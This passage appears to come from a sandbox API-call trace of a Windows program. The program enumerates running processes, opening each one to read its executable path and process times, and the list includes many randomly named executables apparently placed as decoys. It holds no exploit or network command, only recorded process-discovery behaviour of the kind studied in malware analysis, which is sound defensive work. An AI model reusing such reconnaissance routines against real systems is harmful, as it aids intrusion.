th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x328, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0087.715] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x60c) returned 0x10c [0087.715] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\Dwm.exe" (normalized: "c:\\windows\\system32\\dwm.exe")) returned 0x1b [0087.715] wcscpy (in: _Dest=0x28b730, _Source="C:\\Windows\\system32\\Dwm.exe" | out: _Dest="C:\\Windows\\system32\\Dwm.exe") returned="C:\\Windows\\system32\\Dwm.exe" [0087.715] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.715] CloseHandle (hObject=0x10c) returned 1 [0087.715] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x5f4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0087.716] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x618) returned 0x10c [0087.716] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Windows\\Explorer.EXE" (normalized: "c:\\windows\\explorer.exe")) returned 0x17 [0087.716] wcscpy (in: _Dest=0x28b730, _Source="C:\\Windows\\Explorer.EXE" | out: _Dest="C:\\Windows\\Explorer.EXE") returned="C:\\Windows\\Explorer.EXE" [0087.716] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.716] CloseHandle (hObject=0x10c) returned 1 [0087.716] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x66c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x354, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0087.716] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x66c) returned 0x0 [0087.716] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0087.717] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x218) returned 0x0 [0087.717] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x410, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x354, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0087.718] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x410) returned 0x10c [0087.718] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\taskeng.exe" (normalized: "c:\\windows\\system32\\taskeng.exe")) returned 0x1f [0087.718] wcscpy (in: _Dest=0x28b730, _Source="C:\\Windows\\system32\\taskeng.exe" | out: _Dest="C:\\Windows\\system32\\taskeng.exe") returned="C:\\Windows\\system32\\taskeng.exe" [0087.718] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.718] CloseHandle (hObject=0x10c) returned 1 [0087.718] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1dc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0087.719] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x278) returned 0x0 [0087.719] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="blowiranlaboratorydisaster.exe")) returned 1 [0087.719] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x540) returned 0x10c [0087.719] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Common Files\\blowiranlaboratorydisaster.exe" (normalized: "c:\\program files\\common files\\blowiranlaboratorydisaster.exe")) returned 0x3c [0087.720] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Common Files\\blowiranlaboratorydisaster.exe" | out: _Dest="C:\\Program Files\\Common Files\\blowiranlaboratorydisaster.exe") returned="C:\\Program Files\\Common Files\\blowiranlaboratorydisaster.exe" [0087.720] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.720] CloseHandle (hObject=0x10c) returned 1 [0087.720] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="argentina conducting merchandise.exe")) returned 1 [0087.720] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x79c) returned 0x10c [0087.720] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Internet Explorer\\argentina conducting merchandise.exe" (normalized: "c:\\program files\\internet explorer\\argentina conducting merchandise.exe")) returned 0x47 [0087.720] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Internet Explorer\\argentina conducting merchandise.exe" | out: _Dest="C:\\Program Files\\Internet Explorer\\argentina conducting merchandise.exe") returned="C:\\Program Files\\Internet Explorer\\argentina conducting merchandise.exe" [0087.720] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.720] CloseHandle (hObject=0x10c) returned 1 [0087.721] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="output.exe")) returned 1 [0087.721] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x744) returned 0x10c [0087.721] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Analysis Services\\output.exe" (normalized: "c:\\program files\\microsoft analysis services\\output.exe")) returned 0x37 [0087.721] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Microsoft Analysis Services\\output.exe" | out: _Dest="C:\\Program Files\\Microsoft Analysis Services\\output.exe") returned="C:\\Program Files\\Microsoft Analysis Services\\output.exe" [0087.721] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.721] CloseHandle (hObject=0x10c) returned 1 [0087.721] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x528, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="bookings.exe")) returned 1 [0087.722] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x528) returned 0x10c [0087.722] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Adobe\\bookings.exe" (normalized: "c:\\program files\\adobe\\bookings.exe")) returned 0x23 [0087.722] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Adobe\\bookings.exe" | out: _Dest="C:\\Program Files\\Adobe\\bookings.exe") returned="C:\\Program Files\\Adobe\\bookings.exe" [0087.722] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.722] CloseHandle (hObject=0x10c) returned 1 [0087.722] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="lyrics-morning-effectiveness.exe")) returned 1 [0087.723] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x464) returned 0x10c [0087.723] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\DVD Maker\\lyrics-morning-effectiveness.exe" (normalized: "c:\\program files\\dvd maker\\lyrics-morning-effectiveness.exe")) returned 0x3b [0087.723] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\DVD Maker\\lyrics-morning-effectiveness.exe" | out: _Dest="C:\\Program Files\\DVD Maker\\lyrics-morning-effectiveness.exe") returned="C:\\Program Files\\DVD Maker\\lyrics-morning-effectiveness.exe" [0087.723] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.723] CloseHandle (hObject=0x10c) returned 1 [0087.723] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="involved-int-antenna-lol.exe")) returned 1 [0087.724] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x46c) returned 0x10c [0087.724] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Defender\\involved-int-antenna-lol.exe" (normalized: "c:\\program files\\windows defender\\involved-int-antenna-lol.exe")) returned 0x3e [0087.724] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Windows Defender\\involved-int-antenna-lol.exe" | out: _Dest="C:\\Program Files\\Windows Defender\\involved-int-antenna-lol.exe") returned="C:\\Program Files\\Windows Defender\\involved-int-antenna-lol.exe" [0087.724] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.724] CloseHandle (hObject=0x10c) returned 1 [0087.724] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="enterprise monsters comments.exe")) returned 1 [0087.725] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x124) returned 0x10c [0087.725] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office\\enterprise monsters comments.exe" (normalized: "c:\\program files\\microsoft office\\enterprise monsters comments.exe")) returned 0x42 [0087.725] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Microsoft Office\\enterprise monsters comments.exe" | out: _Dest="C:\\Program Files\\Microsoft Office\\enterprise monsters comments.exe") returned="C:\\Program Files\\Microsoft Office\\enterprise monsters comments.exe" [0087.725] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.725] CloseHandle (hObject=0x10c) returned 1 [0087.725] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x804, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="food_logos_lot.exe")) returned 1 [0087.726] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x804) returned 0x10c [0087.726] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\DVD Maker\\food_logos_lot.exe" (normalized: "c:\\program files\\dvd maker\\food_logos_lot.exe")) returned 0x2d [0087.726] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\DVD Maker\\food_logos_lot.exe" | out: _Dest="C:\\Program Files\\DVD Maker\\food_logos_lot.exe") returned="C:\\Program Files\\DVD Maker\\food_logos_lot.exe" [0087.726] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.726] CloseHandle (hObject=0x10c) returned 1 [0087.726] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="designed.exe")) returned 1 [0087.727] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x814) returned 0x10c [0087.727] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Sidebar\\designed.exe" (normalized: "c:\\program files\\windows sidebar\\designed.exe")) returned 0x2d [0087.727] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Windows Sidebar\\designed.exe" | out: _Dest="C:\\Program Files\\Windows Sidebar\\designed.exe") returned="C:\\Program Files\\Windows Sidebar\\designed.exe" [0087.727] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.727] CloseHandle (hObject=0x10c) returned 1 [0087.727] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="chargetrackbacksobserve.exe")) returned 1 [0087.728] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x824) returned 0x10c [0087.728] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Office\\chargetrackbacksobserve.exe" (normalized: "c:\\program files\\microsoft office\\chargetrackbacksobserve.exe")) returned 0x3d [0087.728] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Microsoft Office\\chargetrackbacksobserve.exe" | out: _Dest="C:\\Program Files\\Microsoft Office\\chargetrackbacksobserve.exe") returned="C:\\Program Files\\Microsoft Office\\chargetrackbacksobserve.exe" [0087.728] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.728] CloseHandle (hObject=0x10c) returned 1 [0087.728] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x834, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="info-began-nobody-tops.exe")) returned 1 [0087.729] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x834) returned 0x10c [0087.729] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\MSBuild\\info-began-nobody-tops.exe" (normalized: "c:\\program files\\msbuild\\info-began-nobody-tops.exe")) returned 0x33 [0087.729] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\MSBuild\\info-began-nobody-tops.exe" | out: _Dest="C:\\Program Files\\MSBuild\\info-began-nobody-tops.exe") returned="C:\\Program Files\\MSBuild\\info-began-nobody-tops.exe" [0087.729] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.729] CloseHandle (hObject=0x10c) returned 1 [0087.729] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x844, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="myers biggest qatar.exe")) returned 1 [0087.730] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x844) returned 0x10c [0087.730] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Uninstall Information\\myers biggest qatar.exe" (normalized: "c:\\program files\\uninstall information\\myers biggest qatar.exe")) returned 0x3e [0087.730] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Uninstall Information\\myers biggest qatar.exe" | out: _Dest="C:\\Program Files\\Uninstall Information\\myers biggest qatar.exe") returned="C:\\Program Files\\Uninstall Information\\myers biggest qatar.exe" [0087.730] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.730] CloseHandle (hObject=0x10c) returned 1 [0087.730] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="invalid.exe")) returned 1 [0087.731] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x854) returned 0x10c [0087.731] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Google\\invalid.exe" (normalized: "c:\\program files\\google\\invalid.exe")) returned 0x23 [0087.731] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Google\\invalid.exe" | out: _Dest="C:\\Program Files\\Google\\invalid.exe") returned="C:\\Program Files\\Google\\invalid.exe" [0087.731] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.731] CloseHandle (hObject=0x10c) returned 1 [0087.731] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="panel-maria-suggestion.exe")) returned 1 [0087.732] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x864) returned 0x10c [0087.732] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows NT\\panel-maria-suggestion.exe" (normalized: "c:\\program files\\windows nt\\panel-maria-suggestion.exe")) returned 0x36 [0087.732] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Windows NT\\panel-maria-suggestion.exe" | out: _Dest="C:\\Program Files\\Windows NT\\panel-maria-suggestion.exe") returned="C:\\Program Files\\Windows NT\\panel-maria-suggestion.exe" [0087.732] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.732] CloseHandle (hObject=0x10c) returned 1 [0087.732] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x874, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="remained universe sole.exe")) returned 1 [0087.733] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x874) returned 0x10c [0087.733] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Mail\\remained universe sole.exe" (normalized: "c:\\program files\\windows mail\\remained universe sole.exe")) returned 0x38 [0087.733] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Windows Mail\\remained universe sole.exe" | out: _Dest="C:\\Program Files\\Windows Mail\\remained universe sole.exe") returned="C:\\Program Files\\Windows Mail\\remained universe sole.exe" [0087.733] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.733] CloseHandle (hObject=0x10c) returned 1 [0087.733] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="evanescence oscar em.exe")) returned 1 [0087.734] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x884) returned 0x10c [0087.734] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Internet Explorer\\evanescence oscar em.exe" (normalized: "c:\\program files\\internet explorer\\evanescence oscar em.exe")) returned 0x3b [0087.734] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Internet Explorer\\evanescence oscar em.exe" | out: _Dest="C:\\Program Files\\Internet Explorer\\evanescence oscar em.exe") returned="C:\\Program Files\\Internet Explorer\\evanescence oscar em.exe" [0087.734] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.734] CloseHandle (hObject=0x10c) returned 1 [0087.734] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="fifth roller.exe")) returned 1 [0087.734] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x894) returned 0x10c [0087.734] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Reference Assemblies\\fifth roller.exe" (normalized: "c:\\program files\\reference assemblies\\fifth roller.exe")) returned 0x36 [0087.735] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Reference Assemblies\\fifth roller.exe" | out: _Dest="C:\\Program Files\\Reference Assemblies\\fifth roller.exe") returned="C:\\Program Files\\Reference Assemblies\\fifth roller.exe" [0087.735] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.735] CloseHandle (hObject=0x10c) returned 1 [0087.735] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="irish.exe")) returned 1 [0087.735] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8a4) returned 0x10c [0087.735] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Windows Sidebar\\irish.exe" (normalized: "c:\\program files\\windows sidebar\\irish.exe")) returned 0x2a [0087.736] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Windows Sidebar\\irish.exe" | out: _Dest="C:\\Program Files\\Windows Sidebar\\irish.exe") returned="C:\\Program Files\\Windows Sidebar\\irish.exe" [0087.736] GetProcessTimes (in: hProcess=0x10c, lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958 | out: lpCreationTime=0x28b940, lpExitTime=0x28b948, lpKernelTime=0x28b950, lpUserTime=0x28b958) returned 1 [0087.736] CloseHandle (hObject=0x10c) returned 1 [0087.736] Process32NextW (in: hSnapshot=0xe8, lppe=0x28b500 | out: lppe=0x28b500*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x618, pcPriClassBase=8, dwFlags=0x0, szExeFile="advocate-keep.exe")) returned 1 [0087.736] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8b4) returned 0x10c [0087.736] GetModuleFileNameExW (in: hProcess=0x10c, hModule=0x0, lpFilename=0x28b2f4, nSize=0x104 | out: lpFilename="C:\\Program Files\\Microsoft Analysis Services\\advocate-keep.exe" (normalized: "c:\\program files\\microsoft analysis services\\advocate-keep.exe")) returned 0x3e [0087.737] wcscpy (in: _Dest=0x28b730, _Source="C:\\Program Files\\Microsoft Analysis 